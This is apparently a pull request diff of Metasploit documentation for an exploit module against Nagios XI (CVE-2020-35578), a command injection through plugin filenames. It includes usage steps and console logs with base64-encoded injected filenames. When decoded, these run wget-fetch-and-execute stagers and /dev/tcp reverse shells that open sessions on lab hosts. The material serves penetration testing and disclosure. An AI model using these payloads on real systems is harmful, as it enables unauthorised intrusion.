### PR TITLE
Add Nagios XI Plugins Filename Authenticate RCE module and docs (CVE-2020-35578)

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
@@ -1,0 +1,124 @@
+## Vulnerable Application
+This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugins.php`
+that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
+
+The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
+obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable.
+
+Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`.
+This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
+Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns.
+
+The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1).
+
+Valid credentials for a Nagios XI admin user are required.
+This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+
+Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Detailed installation instructions are available
+[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
+and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [username for the Nagios XI account]`
+5. Do: `set PASSWORD [password for the Nagios XI account]`
+6. Do: `set target [target]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the Nagios XI account to authenticate with.
+### TARGETURI
+The base path to Nagios XI. The default value is `/nagiosxi/`.
+### USERNAME
+The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Linux
+1   CMD
+```
+
+## Scenarios
+### Nagios XI 5.7.3 running on CentOS 7 - Linux target
+```
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   nagiosadmin      yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   nagiosadmin      yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4011             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4011 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.3
+[+] The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/eaGWp8C5GQVvqG
+[*] Local IP: http://192.168.1.12:8080/eaGWp8C5GQVvqG
+[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /eaGWp8C5GQVvqG
+[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
+[*] Sending stage (976712 bytes) to 192.168.1.14
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Meterpreter session 1 opened (192.168.1.12:4011 -> 192.168.1.14:48622) at 2021-02-01 12:33:13 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#' on the target
+
+meterpreter > 
+[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#
+getuid
+Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
+```
+### Nagios XI 5.7.3 running on CentOS 7 - CMD target
+```
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4012 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.3
+[+] The target appears to be vulnerable.
+[*] Executing the payload
+[*] Command shell session 2 opened (192.168.1.12:4012 -> 192.168.1.14:40864) at 2021-02-01 12:35:09 -0500
+[+] Deleted /usr/local/nagios/libexec/;echo MDwmNTYtO2V4ZWMgNTY8Pi9kZXYvdGNwLzE5Mi4xNjguOTEuMTI4LzQwMTI7c2ggPCY1NiA+JjU2IDI+JjU2 | base64 -d | bash;#
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+```

--- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
@@ -1,22 +1,26 @@
 ## Vulnerable Application
-This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugins.php`
-that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
+This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
+page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated
+admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
-obtain the Nagios XI version number, which is then used to check if the target is Nagios XI 5.3.0-5.7.9 and therefore vulnerable.
+obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable.
 
-Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`.
-This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
-Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns.
+Next, the module sends a HTTP POST request to `/admin/monitoringplugins.php` containing a file whose filename is set such that it
+will escape the existing command that `/admin/monitoringplugins.php` uses on its backend and will instead cause the server to start
+executing the attacker's own commands as the `apache` user.
+
+Once the upload is complete, a new plugin entry will be created along with a corresponding file in `/usr/local/nagios/libexec/`
+with the full payload as the file name. Deleting the malicious plugin/file via the web interface was not possible during testing,
+so it is automatically deleted when a session spawns.
 
 The module may fail during the first run. If that happens, try running it again with the same settings.
 
-The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1).
+The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1)
+and has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
+Valid credentials for a Nagios XI admin user are required for exploitation.
 
-Valid credentials for a Nagios XI admin user are required.
-This module has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
-
-Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
 Detailed installation instructions are available
 [here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
 and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
@@ -25,8 +29,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 1. Start msfconsole
 2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce`
 3. Do: `set RHOSTS [IP]`
-4. Do: `set USERNAME [username for the Nagios XI account]`
-5. Do: `set PASSWORD [password for the Nagios XI account]`
+4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
+5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
 6. Do: `set target [target]`
 7. Do: `set payload [payload]`
 8. Do: `set LHOST [IP]`
@@ -47,14 +51,14 @@ The username for the Nagios XI account to authenticate with. The default value i
 ```
 Id  Name
 --  ----
-0   Linux
+0   Linux (x86/x64)
 1   CMD
 ```
 
 ## Scenarios
 ### Nagios XI 5.3.0 running on CentOS 7 - Linux target
 ```
-msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.16
 rhosts => 192.168.1.16
@@ -62,7 +66,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos
 lhost => 192.168.1.12
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosxi
 password => nagiosxi
-msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
@@ -99,12 +103,12 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Linux
+   0   Linux (x86/x64)
 
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -125,7 +129,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4
 ```
 ### Nagios XI 5.7.5 running on CentOS 7 - CMD target
 ```
-msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target 1
 target => 1
@@ -135,7 +139,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos
 lhost => 192.168.1.12
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin
 password => nagiosadmin
-msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
@@ -177,7 +181,7 @@ Exploit target:
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -192,7 +196,7 @@ uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) contex
 ```
 ### Nagios XI 5.7.5 running on CentOS 7 (unfinished installation) - Linux target
 ```
-msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14
 rhosts => 192.168.1.14
@@ -202,7 +206,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set pass
 password => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set finish_install true
 finish_install => true
-msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
@@ -239,12 +243,12 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Linux
+   0   Linux (x86/x64)
 
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [!] The target seems to be a Nagios XI application that has not been fully installed yet.

--- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
@@ -276,3 +276,154 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 meterpreter > getuid
 Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
 ```
+
+### Nagios XI 5.5.6 on Ubuntu 20.04 LTS - Linux Target
+```
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set RHOSTS 172.25.34.240
+RHOSTS => 172.25.34.240
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set LHOST 172.25.33.151
+LHOST => 172.25.33.151
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes s
+                                              igning the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          172.25.34.240    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
+                                              cal machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.25.33.151    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux (x86/x64)
+
+
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 172.25.33.151:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.5.6
+[+] The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/dDiGLvu7R
+[*] Local IP: http://172.25.33.151:8080/dDiGLvu7R
+[*] Client 172.25.34.240 (Wget/1.19.4 (linux-gnu)) requested /dDiGLvu7R
+[*] Sending payload to 172.25.34.240 (Wget/1.19.4 (linux-gnu))
+[*] Sending stage (980808 bytes) to 172.25.34.240
+[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9ReVJkU3RzYiBodHRwOi8vMTcyLjI1LjMzLjE1MTo4MDgwL2REaUdMdnU3UjtjaG1vZCAreCAvdG1wL1F5UmRTdHNiOy90bXAvUXlSZFN0c2I7cm0gLWYgL3RtcC9ReVJkU3RzYg== | base64 -d | bash;#
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Meterpreter session 1 opened (172.25.33.151:4444 -> 172.25.34.240:60352) at 2021-04-14 16:06:07 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data @ test-Virtual-Machine (uid=33, gid=33, euid=33, egid=33)
+meterpreter > shell
+Process 18247 created.
+Channel 1 created.
+whoami
+www-data
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
+pwd
+/usr/local/nagiosxi/html/admin
+exit
+meterpreter >
+```
+
+### Nagios XI 5.5.6 on Ubuntu 20.04 LTS - CMD Target
+```
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set RHOSTS 172.25.34.240
+RHOSTS => 172.25.34.240
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set LHOST 172.25.33.151
+LHOST => 172.25.33.151
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target CMD
+target => CMD
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes s
+                                              igning the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          172.25.34.240    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
+                                              cal machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.25.33.151    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   CMD
+
+
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 172.25.33.151:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.5.6
+[+] The target appears to be vulnerable.
+[*] Executing the payload
+[+] Deleted /usr/local/nagios/libexec/;echo MDwmMTk1LTtleGVjIDE5NTw+L2Rldi90Y3AvMTcyLjI1LjMzLjE1MS80NDQ0O3NoIDwmMTk1ID4mMTk1IDI+JjE5NQ== | base64 -d | bash;#
+[*] Command shell session 2 opened (172.25.33.151:4444 -> 172.25.34.240:60358) at 2021-04-14 16:09:22 -0500
+
+whoami
+www-data
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
+pwd
+/usr/local/nagiosxi/html/admin
+```

--- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
@@ -3,16 +3,18 @@ This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugi
 that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
-obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable.
+obtain the Nagios XI version number, which is then used to check if the target is Nagios XI 5.3.0-5.7.9 and therefore vulnerable.
 
 Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`.
 This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
 Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns.
 
+The module may fail during the first run. If that happens, try running it again with the same settings.
+
 The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1).
 
 Valid credentials for a Nagios XI admin user are required.
-This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+This module has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
 
 Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
 Detailed installation instructions are available
@@ -31,6 +33,9 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 9. Do: `exploit`
 
 ## Options
+### FINISH_INSTALL
+If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
+This includes signing the license agreement. The default value is `false`.
 ### PASSWORD
 The password for the Nagios XI account to authenticate with.
 ### TARGETURI
@@ -47,26 +52,39 @@ Id  Name
 ```
 
 ## Scenarios
-### Nagios XI 5.7.3 running on CentOS 7 - Linux target
+### Nagios XI 5.3.0 running on CentOS 7 - Linux target
 ```
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.16
+rhosts => 192.168.1.16
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosxi
+password => nagiosxi
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   PASSWORD   nagiosadmin      yes       Password to authenticate with
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      80               yes       The target port (TCP)
-   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT    8080             yes       The local port to listen on.
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
-   URIPATH                     no        The URI to use for this exploit (default is random)
-   USERNAME   nagiosadmin      yes       Username to authenticate with
-   VHOST                       no        HTTP server virtual host
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosxi         yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
 
 
 Payload options (linux/x86/meterpreter/reverse_tcp):
@@ -74,7 +92,7 @@ Payload options (linux/x86/meterpreter/reverse_tcp):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
-   LPORT  4011             yes       The listen port
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -86,39 +104,171 @@ Exploit target:
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4011 
+[*] Started reverse TCP handler on 192.168.1.12:4444 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
-[*] Target is Nagios XI with version 5.7.3
+[*] Target is Nagios XI with version 5.3.0
 [+] The target appears to be vulnerable.
-[*] Using URL: http://0.0.0.0:8080/eaGWp8C5GQVvqG
-[*] Local IP: http://192.168.1.12:8080/eaGWp8C5GQVvqG
-[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /eaGWp8C5GQVvqG
-[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
-[*] Sending stage (976712 bytes) to 192.168.1.14
-[*] Command Stager progress - 100.00% done (121/121 bytes)
-[*] Meterpreter session 1 opened (192.168.1.12:4011 -> 192.168.1.14:48622) at 2021-02-01 12:33:13 -0500
+[*] Using URL: http://0.0.0.0:8080/1V9MerMauwnh8
+[*] Local IP: http://192.168.1.12:8080/1V9MerMauwnh8
+[*] Client 192.168.1.16 (Wget/1.14 (linux-gnu)) requested /1V9MerMauwnh8
+[*] Sending payload to 192.168.1.16 (Wget/1.14 (linux-gnu))
+[*] Sending stage (980808 bytes) to 192.168.1.16
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9hSVN5dVRtZiBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC8xVjlNZXJNYXV3bmg4O2NobW9kICt4IC90bXAvYUlTeXVUbWY7L3RtcC9hSVN5dVRtZjtybSAtZiAvdG1wL2FJU3l1VG1m | base64 -d | bash;#
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54012) at 2021-04-01 12:12:35 -0400
 [*] Server stopped.
-[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#' on the target
 
-meterpreter > 
-[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#
-getuid
+meterpreter > getuid
 Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
 ```
-### Nagios XI 5.7.3 running on CentOS 7 - CMD target
+### Nagios XI 5.7.5 running on CentOS 7 - CMD target
 ```
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14
+rhosts => 192.168.1.14
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin
+password => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
